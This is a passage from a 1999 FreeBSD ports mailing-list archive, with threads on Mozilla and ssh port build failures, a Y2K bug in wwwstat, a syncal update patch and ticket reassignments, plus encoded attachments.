MU%ZO)\JR?)1&6&TRN,`N0`\TW3CM&8J:>P\&@+0WK1[(]%_MPF`@@OU^/1I> M?K:79E^P>:9KK9U&6>+B5(39\'(TMJ:COC"9K[>'.N%Z]G9M32_Z@I]@_"7U M1,0\2N^//V1/[?V7]&H?/M7 M#Y$_73_"1RV`(.0F!F09QG;=B[(((G@1^I*1P#.HZZ#I>M3EP_*23F0/KU]3 MY;#Y'K:W'DDDT7N25[&S&(I"'\J@ M[F.^'44]RSNEI8"LMGH*8YW,*TC<3H55;3<*_7:4D!N>:!@GH&F@G-,L-%=) M=_G)N.K>JFYH9X:B%R%L\Y[>4G60<\'VAQ-!$.S5<+F"Q1C,Q7QL3=;+XF4Q2!P`X*7SS7V$@/OX&S4;3_FBO1C.IQ=<"$F9WE%,(@%)/$&YNE'D01U36:H:`WS32] M6-`R`X_RBO?`3C>KFNK>WZ&S)7DWW-Q@IZVZP.,/C55:XBOVNWK/R+^RS&+M M(:[,!RC=.`GV\MFIJM)25IC4W+ZPESV5ULC3I_*&JRVZ'A&Z0>?A9C&O(UO#\C^'43EMG M%$TN?@0F9=D[:SZ2T&-."A*?;6"+*.E-94\[#[&N&9_GOLU>'9.&G&0 MH,"%9>#5Z^#EO"/*G;](^#].?%*`=$KO M.7;;YO+?@92%T:]#]%L0OMO-T%Q*E60:%F/[I;*Y^Y&AIE5/W`?P?/I/%Q/@L``"Y^ ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 18:28:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [169.237.7.38]) by hub.freebsd.org (Postfix) with ESMTP id 360931539A for ; Mon, 13 Dec 1999 18:28:09 -0800 (PST) (envelope-from obrien@NUXI.com) Received: from dragon.nuxi.com (root@d60-025.leach.ucdavis.edu [169.237.60.25]) by relay.nuxi.com (8.9.3/8.9.3) with ESMTP id SAA09682; Mon, 13 Dec 1999 18:28:01 -0800 (PST) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id SAA35748; Mon, 13 Dec 1999 18:28:00 -0800 (PST) (envelope-from obrien) Date: Mon, 13 Dec 1999 18:28:00 -0800 From: "David O'Brien" To: Greg Lehey Cc: ports@FreeBSD.ORG Subject: Re: editors/xemacs21 merged (1/2) Message-ID: <19991213182800.A35714@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG References: <199912100848.RAA59354@pis.toba-cmt.ac.jp> <19991211121451.B760@mojave.worldwide.lemis.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <19991211121451.B760@mojave.worldwide.lemis.com>; from grog@lemis.com on Sat, Dec 11, 1999 at 12:14:51PM -0600 X-Operating-System: FreeBSD 4.0-CURRENT Organization: The NUXI BSD group X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > [-- message/partial is unsupported (use 'v' to view this part) --] > > How do I read this message? In Mutt, hit "v" to view attachments. Then hit "T" to force the treatment of the attachment as text. -- -- David (obrien@NUXI.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 18:42:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from viper.lovett.com (viper.lovett.com [216.60.121.173]) by hub.freebsd.org (Postfix) with ESMTP id CD248154A0 for ; Mon, 13 Dec 1999 18:42:36 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by viper.lovett.com with local (Exim 3.03 #1) id 11xhup-000KBF-00; Mon, 13 Dec 1999 20:42:15 -0600 Date: Mon, 13 Dec 1999 20:42:15 -0600 From: Ade Lovett To: The Hermit Hacker Cc: reg@shale.csir.co.za, freebsd-ports@freebsd.org Subject: Re: Mozilla port broken under 4.0-CURRENT? Message-ID: <19991213204215.C75199@lovett.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from scrappy@hub.org on Mon, Dec 13, 1999 at 08:10:10PM -0400 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Dec 13, 1999 at 08:10:10PM -0400, The Hermit Hacker wrote: > > Just upgraded my system, and tried to compile Mozilla, and it gets down to > compiling the 'tools' subdirectory before failing, with the failure being > attached... > > This is a -current system updated to yesterday... > > [snip] Umm.. looks like 'c++' is picking up totally the wrong compiler.. From the typescript: ... c++ -o IdlParser.o -c -fno-rtti -fexceptions -Wall -Wconversion -Wpointer-arit h -Wbad-function-cast -Wcast-align -Woverloaded-virtual -Wsynth -Wshadow -Wno-lo ng-long -DMOZILLA_CLIENT -include ../../config-defs.h -O3 -mpentium -pipe -pthre ad -O -fPIC -DOSTYPE=\"FreeBSD4\" -I../../dist/include -I../../dist/include - I../../dist/include -I../../include -I/usr/local/include -I/usr/local/include -I/usr/X11R6/include IdlParser.cpp c++: unrecognized option `-pthread' cc1plus: Invalid option `-Wno-long-long' /usr/local/lib/gcc-lib/i386-unknown-freebsd4.0/2.8.1/include/g++/stream.h: In fu nction `class istream & WS(class istream &)': ... Note two things here: 1. unrecognized option '-pthread' to c++ 2. reference to /usr/local/lib/gcc-lib/.../2.8.1/... So, the port is picking up the 2.8.1 version of gcc from somewhere (maybe an old port lying around?) It certainly isn't gcc-2.95.2: anaconda 2975% uname -r 4.0-CURRENT anaconda 2976% c++ --version 2.95.2 anaconda 2977% c++ -pthread c++: No input files specified -aDe -- Ade Lovett, Austin, TX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 20:31:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from thelab.hub.org (nat196.191.mpoweredpc.net [142.177.196.191]) by hub.freebsd.org (Postfix) with ESMTP id 1E61F14A2D for ; Mon, 13 Dec 1999 20:31:15 -0800 (PST) (envelope-from scrappy@hub.org) Received: from localhost (scrappy@localhost) by thelab.hub.org (8.9.3/8.9.1) with ESMTP id AAA65817; Tue, 14 Dec 1999 00:31:05 -0400 (AST) (envelope-from scrappy@hub.org) X-Authentication-Warning: thelab.hub.org: scrappy owned process doing -bs Date: Tue, 14 Dec 1999 00:31:04 -0400 (AST) From: The Hermit Hacker To: Ade Lovett Cc: reg@shale.csir.co.za, freebsd-ports@freebsd.org Subject: Re: Mozilla port broken under 4.0-CURRENT? In-Reply-To: <19991213204215.C75199@lovett.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org doing a 'which c++' as root shows up /usr/bin/c++, but the port appears to be finding /usr/local/bin/c++ :( just did a pkg_delete and am trying again... On Mon, 13 Dec 1999, Ade Lovett wrote: > On Mon, Dec 13, 1999 at 08:10:10PM -0400, The Hermit Hacker wrote: > > > > Just upgraded my system, and tried to compile Mozilla, and it gets down to > > compiling the 'tools' subdirectory before failing, with the failure being > > attached... > > > > This is a -current system updated to yesterday... > > > > [snip] > > > Umm.. looks like 'c++' is picking up totally the wrong compiler.. > > >From the typescript: > > ... > c++ -o IdlParser.o -c -fno-rtti -fexceptions -Wall -Wconversion -Wpointer-arit > h -Wbad-function-cast -Wcast-align -Woverloaded-virtual -Wsynth -Wshadow -Wno-lo > ng-long -DMOZILLA_CLIENT -include ../../config-defs.h -O3 -mpentium -pipe -pthre > ad -O -fPIC -DOSTYPE=\"FreeBSD4\" -I../../dist/include -I../../dist/include - > I../../dist/include -I../../include -I/usr/local/include -I/usr/local/include > -I/usr/X11R6/include IdlParser.cpp > c++: unrecognized option `-pthread' > cc1plus: Invalid option `-Wno-long-long' > /usr/local/lib/gcc-lib/i386-unknown-freebsd4.0/2.8.1/include/g++/stream.h: In fu > nction `class istream & WS(class istream &)': > ... > > Note two things here: > > 1. unrecognized option '-pthread' to c++ > 2. reference to /usr/local/lib/gcc-lib/.../2.8.1/... > > So, the port is picking up the 2.8.1 version of gcc from somewhere > (maybe an old port lying around?) > > It certainly isn't gcc-2.95.2: > > anaconda 2975% uname -r > 4.0-CURRENT > anaconda 2976% c++ --version > 2.95.2 > anaconda 2977% c++ -pthread > c++: No input files specified > > -aDe > > -- > Ade Lovett, Austin, TX. > Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy Systems Administrator @ hub.org primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 21:11:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from thelab.hub.org (nat196.191.mpoweredpc.net [142.177.196.191]) by hub.freebsd.org (Postfix) with ESMTP id 2425114A2D for ; Mon, 13 Dec 1999 21:11:23 -0800 (PST) (envelope-from scrappy@hub.org) Received: from localhost (scrappy@localhost) by thelab.hub.org (8.9.3/8.9.1) with ESMTP id BAA97793; Tue, 14 Dec 1999 01:11:09 -0400 (AST) (envelope-from scrappy@hub.org) X-Authentication-Warning: thelab.hub.org: scrappy owned process doing -bs Date: Tue, 14 Dec 1999 01:11:09 -0400 (AST) From: The Hermit Hacker To: Ade Lovett Cc: reg@shale.csir.co.za, freebsd-ports@FreeBSD.ORG Subject: Re: Mozilla port broken under 4.0-CURRENT? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-1476716628-945148269=:63537" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-1476716628-945148269=:63537 Content-Type: TEXT/PLAIN; charset=US-ASCII compiler problem fixed, but still fails to compile...output of error message attached... %c++ -v Using builtin specs. gcc version 2.95.2 19991024 (release) On Tue, 14 Dec 1999, The Hermit Hacker wrote: > > doing a 'which c++' as root shows up /usr/bin/c++, but the port appears to > be finding /usr/local/bin/c++ :( just did a pkg_delete and am trying > again... > > > > On Mon, 13 Dec 1999, Ade Lovett wrote: > > > On Mon, Dec 13, 1999 at 08:10:10PM -0400, The Hermit Hacker wrote: > > > > > > Just upgraded my system, and tried to compile Mozilla, and it gets down to > > > compiling the 'tools' subdirectory before failing, with the failure being > > > attached... > > > > > > This is a -current system updated to yesterday... > > > > > > [snip] > > > > > > Umm.. looks like 'c++' is picking up totally the wrong compiler.. > > > > >From the typescript: > > > > ... > > c++ -o IdlParser.o -c -fno-rtti -fexceptions -Wall -Wconversion -Wpointer-arit > > h -Wbad-function-cast -Wcast-align -Woverloaded-virtual -Wsynth -Wshadow -Wno-lo > > ng-long -DMOZILLA_CLIENT -include ../../config-defs.h -O3 -mpentium -pipe -pthre > > ad -O -fPIC -DOSTYPE=\"FreeBSD4\" -I../../dist/include -I../../dist/include - > > I../../dist/include -I../../include -I/usr/local/include -I/usr/local/include > > -I/usr/X11R6/include IdlParser.cpp > > c++: unrecognized option `-pthread' > > cc1plus: Invalid option `-Wno-long-long' > > /usr/local/lib/gcc-lib/i386-unknown-freebsd4.0/2.8.1/include/g++/stream.h: In fu > > nction `class istream & WS(class istream &)': > > ... > > > > Note two things here: > > > > 1. unrecognized option '-pthread' to c++ > > 2. reference to /usr/local/lib/gcc-lib/.../2.8.1/... > > > > So, the port is picking up the 2.8.1 version of gcc from somewhere > > (maybe an old port lying around?) > > > > It certainly isn't gcc-2.95.2: > > > > anaconda 2975% uname -r > > 4.0-CURRENT > > anaconda 2976% c++ --version > > 2.95.2 > > anaconda 2977% c++ -pthread > > c++: No input files specified > > > > -aDe > > > > -- > > Ade Lovett, Austin, TX. > > > > Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy > Systems Administrator @ hub.org > primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-ports" in the body of the message > Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy Systems Administrator @ hub.org primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org --0-1476716628-945148269=:63537 Content-Type: APPLICATION/octet-stream; name="typescript.gz" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="typescript.gz" H4sICEHRVTgAA3R5cGVzY3JpcHQA3ZrxT9s4FMd/71/xtJNGBgtt0pa2Pu2H bYBUiRvoyt3ubpuOkLjFRxpHjgtjf/3ZTgklsUOaKRIBobSx4+97/vj52Unq B8ApDZNfYbH0rjGQKOFeGHbU2Rf3G4KjiGNGogUEhGGfU3YHF91VwroBvunG lPGke3t7213SHyQMve4tZdfZSUCXXSW/0/H39sCmMA3CM48lmO1TsH0AsOcR tRnnRHzD330cc0KjBOzPwgtx9Gl0g1kiysRJTIl0xvYY4Vfi/NIL7Pkq8mUT 2/cSLhuID9sLyUI2oKJtSL0AB/YNYXzlScnkLlKtkysvoLfii3AgpNFCHcA+ /O30n+nJyft/P55Mjz6dg00iP1wFGPb3u+JfODQnCzvA82RfqJz2wV7GOOJk tQQ7JjEWR37FsBeIStm9s+lH8XF4Ojv/++zo3ddXxwzjD7PDwddXoniaigYk 4d17O9sX3p+LAjUyIfW9cOMqTWF27V+O8/vBQ/HD+Phx3JlGMCehjApVHcCc 0SWoduui7mJvr0sTLjq83L9C7vBtB/J/qtEjYTQYok5BJlMBaXc9rnDhh16S AElr4TV8nlnZyZudMp3hAYJbj0UiehEEWAgxT2nSOVyIq3YgjYEEFiG9FMGx cU3nscPSpSXmVzSAixtKgof+IKQ+Lf/KY7D7VlbMYuyTOfFTY8rJx2qO4yAB lXAiIvVH5lMkw1hEPweG55jhyMfA70RIrRm8vxTTLZWB1zs6TYWa3XjhCkvB tPFGs53OUTbHBKDBRLoBsRCXM9xji9VSxDI4itBGO4Q2TqxHfrwpOjKs07lj EWifKD+mqyjInNR1c2joplYg12EZEeYOaxUQ0hZbBn8LODYjJ+2pqJ/KPDb3 BILdQiRldValUEq7tC3tzIiUEijKiEsLWuJGkRz10aiMulEFIWOVVeJ/MSAP ek0jkhZajWgyaBqRtNBmRG6vVlrbApGy0GpETq1clCqUgXFMGSjXNI+jV4Yj 13adfR8KrIJfxQ67btMxIS20OSae3DhlYh9ocKdZ8t4+Xi81S2C/8VHov6RR yDYhp5f/iRs6zQ7kXHRN3OBU2n/0+6M68MXOabqMQywh4LL9ntLXojdI5Le4 bhl4gwZChgrL6PdPIp9xtvJ5NeKDWlm2OvGBKdu2kfhRJG7Mi7xlcSXag3rL vtR/Oq8MjCu+rn2O83hQxlkngJCu1NL7WsA7cGrN9IokHNM0f44k3CZjwm1R TGyX5P6I1LpVZdb1m81xSv/F5Lg/PUa8y1D3MOGjpFUJ+bBX6y5ZGXg6qpW6 FrhWIIfbcUp5ayUQ0hZbBocLpIdOrV1lVR6OaUf5bHm4jcaH27r4cCeN8pi0 jMd2S8HGbUyV3NTwlnf4ora87zln5HLFdetBVqe90yYRVwd4Bz3NKIxrbQAz kxWifmzaBRpFciMxcUrfaJhUEDJWWSX+F8bjYNg0ImWh1YgOauXNbRAdmHJn SxBpZ/Xx/QvR4qS+r9LO6XN6jUWj4nQeDWttcLYYCGWhzQMxmtTa8wgFT4wf ZhUQTUz7HqNIfq1PH1CUPOXWy6jY0VdZJR0oMBr3673uXcfs04iUAf0bX4NG PojGpS99DSIImWoss+9FOvWy3RZ0jMmuDXRGTcfOqM2xM26azrjNdOrl5i3o GFNzC+hotxBZWi/ZQ2TXVLoxm9R7TrfFAjkxPqlrywLp9HrjhiGlJlpOqd7z pa0oGR8yPV9KDz/E3d3dhS8bv5/9BkeMUQbOxjUn2LshP/1b3VTPube5/k3w vT13o/7n7K0tmczI0vS7TwMsCjozTmOJ32xjP9/KabLVL4C/E95Rh87MZyTm ENBIBFYE5yK+DrEPzgB6DuqN0NAFZzKZdP4H0ffiwnMtAAA= --0-1476716628-945148269=:63537-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 23:50: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BDA1115582 for ; Mon, 13 Dec 1999 23:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA81806; Mon, 13 Dec 1999 23:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 8688415335; Mon, 13 Dec 1999 23:49:03 -0800 (PST) Message-Id: <19991214074903.8688415335@hub.freebsd.org> Date: Mon, 13 Dec 1999 23:49:03 -0800 (PST) From: dwhite@freebsd.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15476: ssh 1.2.27 port BROKEN: patch-ac does not apply Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15476 >Category: ports >Synopsis: ssh 1.2.27 port BROKEN: patch-ac does not apply >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 23:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Doug White >Release: 4.0-CURRENT >Organization: >Environment: FreeBSD bond.dogcow.org 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Mon Dec 6 22:43:31 PST 1999 dwhite@bond.dogcow.org:/usr/src/sys/compile/BOND i386 CVSupped as of 12:30AM 12/12/1999. >Description: The patch for the RSA overflow does not apply to the rsaref sources. If you try to build the port it dies during rsaref: ===> ssh-1.2.27 depends on file: /nonexistent - not found ===> Verifying extract for /nonexistent in /usr/ports/security/rsaref ===> Extracting for rsaref-2.0 >How-To-Repeat: Build the ssh port. >Fix: >Release-Note: >Audit-Trail: >Unformatted: >> Checksum OK for rsaref20.1996.tar.Z. ===> Returning to build of ssh-1.2.27 ===> ssh-1.2.27 depends on shared library: rsaref.2 - not found ===> Verifying install for rsaref.2 in /usr/ports/security/rsaref ===> Patching for rsaref-2.0 ===> Applying FreeBSD patches for rsaref-2.0 4 out of 4 hunks failed--saving rejects to rsa.c.rej *** Error code 4 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 0: 4:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 41C6F1531E; Tue, 14 Dec 1999 00:04:35 -0800 (PST) (envelope-from str@giganda.komkon.org) Received: (from root@localhost) by giganda.komkon.org (8.9.3/8.9.3) id DAA50196; Tue, 14 Dec 1999 03:04:21 -0500 (EST) Date: Tue, 14 Dec 1999 03:04:21 -0500 (EST) From: Igor Roshchin Message-Id: <199912140804.DAA50196@giganda.komkon.org> To: andreas@klemm.gtn.com Subject: wwwstat-2.01 port is not Y2K compliant Cc: freebsd-bugs@FreeBSD.ORG, ports@FreeBSD.ORG Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! I just found that the wwwstat-2.01 port still has not been fixed, and is not Y2K compliant: For example: the file "monthly": $ArcStats = '/dc/ud/www/documentroot/Admin/stats-19' . $year . '/' . $LastMonth . '.wwwstats.html'; It relies on the 2-digit representation of the year (from $year), and adds "19" before it. I am not sure if other files in the package have similar problem. I just submitted a PR via web-interface. Regards, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 0:10: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4667015570 for ; Tue, 14 Dec 1999 00:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA83907; Tue, 14 Dec 1999 00:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CF9A015265; Tue, 14 Dec 1999 00:03:29 -0800 (PST) Message-Id: <19991214080329.CF9A015265@hub.freebsd.org> Date: Tue, 14 Dec 1999 00:03:29 -0800 (PST) From: str@komkon.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15477: wwwstat-2.01 port is not Y2K compliant: 19 is hardcoded. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15477 >Category: ports >Synopsis: wwwstat-2.01 port is not Y2K compliant: 19 is hardcoded. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 00:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Igor Roshchin >Release: 3-stable >Organization: KomKon >Environment: >Description: The wwwstat-2.01 port still has not been fixed, and is not Y2K compliant: For example: the file "monthly": $ArcStats = '/dc/ud/www/documentroot/Admin/stats-19' . $year . '/' . $LastMonth . '.wwwstats.html'; It relies on the 2-digit representation of the year (from $year), and adds "19" before it. I am not sure if other files in the package have similar problem. >How-To-Repeat: Wait until Y2K :) >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 1:50:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8A85215310 for ; Tue, 14 Dec 1999 01:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA91673; Tue, 14 Dec 1999 01:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from henoch.cc.fh-lippe.de (henoch.cc.fh-lippe.de [193.16.112.72]) by hub.freebsd.org (Postfix) with ESMTP id 122CF150D0 for ; Tue, 14 Dec 1999 01:42:17 -0800 (PST) (envelope-from lkoeller@cc.fh-lippe.de) Received: from spock.cc.fh-lippe.de([193.16.118.120]) (3019 bytes) by henoch.cc.fh-lippe.de via sendmail with P:smtp/R:inet_hosts/T:smtp (sender: ) id for ; Tue, 14 Dec 1999 10:42:15 +0100 (MET) (Smail-3.2.0.101 1997-Dec-17 #3 built 1998-Feb-3) Received: from door.lippe.de by spock.cc.fh-lippe.de with smtp (Smail3.1.29.1 #2) id m11xoTE-0006ylC; Tue, 14 Dec 99 10:42 MET Received: from odie.lippe.de (odie.lippe.de [192.168.4.2]) by door.lippe.de (8.9.3/8.9.3) with ESMTP id KAA70185 for ; Tue, 14 Dec 1999 10:39:12 +0100 (CET) (envelope-from lkoeller@lippe.de) Received: (from lkoeller@localhost) by odie.lippe.de (8.9.3/8.9.3) id KAA58586; Tue, 14 Dec 1999 10:39:11 +0100 (CET) (envelope-from lkoeller) Message-Id: <199912140939.KAA58586@odie.lippe.de> Date: Tue, 14 Dec 1999 10:39:11 +0100 (CET) From: lkoeller@cc.fh-lippe.de Reply-To: lkoeller@cc.fh-lippe.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15479: Ports update of syncal to version 0.8.3 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15479 >Category: ports >Synopsis: Ports update of syncal to version 0.8.3 >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 01:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Lars Koeller >Release: FreeBSD 3.3-RELEASE i386 >Organization: Fachhochschule Lippe, Lemgo, Germany >Environment: FreeBSD-3.3 Release i386 >Description: Update of syncal to version 0.8.3. A bug occuring in conjunction with the usage of the Palm application DateBK3 (usage of icons) has been fixed. >How-To-Repeat: - > Fix: Apply the appended Patches to the Makefile and md5 file. The patches are made against the current version in the ports, which is 0.8.1. *** /usr/ports/palm/syncal/Makefile Sat Oct 2 18:43:43 1999 --- Makefile Tue Dec 14 10:03:33 1999 *************** *** 3,12 **** # Date created: So 7 Feb 1999 20:50:43 MET # Whom: Lars Koeller # ! # $FreeBSD: ports/palm/syncal/Makefile,v 1.4 1999/10/02 16:43:43 sumikawa Exp $ # ! DISTNAME= syncal-0.8.1 CATEGORIES= palm comms deskutils MASTER_SITES= http://hopf.math.nwu.edu/syncal/ --- 3,12 ---- # Date created: So 7 Feb 1999 20:50:43 MET # Whom: Lars Koeller # ! # $Id$ # ! DISTNAME= syncal-0.8.3 CATEGORIES= palm comms deskutils MASTER_SITES= http://hopf.math.nwu.edu/syncal/ *************** *** 28,34 **** ${SED} -e "s:@@PREFIX@@:${PREFIX}:g" ${WRKSRC}/user.tcl.patched > ${WRKSRC}/user.tcl ${MV} ${WRKSRC}/ical.patch ${WRKSRC}/ical.patch.patched ${SED} -e "s:@@PREFIX@@:${PREFIX}:g" ${WRKSRC}/ical.patch.patched > ${WRKSRC}/ical.patch - ${RM} ${WRKSRC}/*.o # # ical V2.2 needs a little patch, don't know how to do better --- 28,33 ---- *** /usr/ports/palm/syncal/files/md5 Fri Sep 17 21:47:10 1999 --- files/md5 Tue Dec 14 10:02:19 1999 *************** *** 1 **** ! MD5 (syncal-0.8.1.tar.gz) = 54cb4558ec3e02fd395ff03c7d87fc52 --- 1 ---- ! MD5 (syncal-0.8.3.tar.gz) = 2ff97f5b0ad20cf8009866d4a0082f70 >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 2:27:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DED7214D12; Tue, 14 Dec 1999 02:27:40 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA94826; Tue, 14 Dec 1999 02:27:40 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 02:27:40 -0800 (PST) From: Message-Id: <199912141027.CAA94826@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/6181: New port: xoj-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: xoj-1.0 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 02:25:18 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 2:31:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2224614C05; Tue, 14 Dec 1999 02:31:27 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA95204; Tue, 14 Dec 1999 02:31:27 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 02:31:27 -0800 (PST) From: Message-Id: <199912141031.CAA95204@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/7485: New port: Xterminal-0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: Xterminal-0.2 Responsible-Changed-From-To: andy->ports Responsible-Changed-By: andy Responsible-Changed-When: Tue Dec 14 02:29:53 PST 1999 Responsible-Changed-Why: I have no approvements from PW to touch ports tree. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 2:32:36 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E1DB614C4F; Tue, 14 Dec 1999 02:32:35 -0800 (PST) (envelope-from andy@FreeBSD.org) Received: (from andy@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA95342; Tue, 14 Dec 1999 02:32:35 -0800 (PST) (envelope-from andy@FreeBSD.org) Date: Tue, 14 Dec 1999 02:32:35 -0800 (PST) From: Message-Id: <199912141032.CAA95342@freefall.freebsd.org> To: andy@FreeBSD.org, andy@FreeBSD.org, ports@FreeBSD.org Subject: Re: ports/12204: Update port: graphics/EZWGL Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/EZWGL Responsible-Changed-From-To: andy->ports 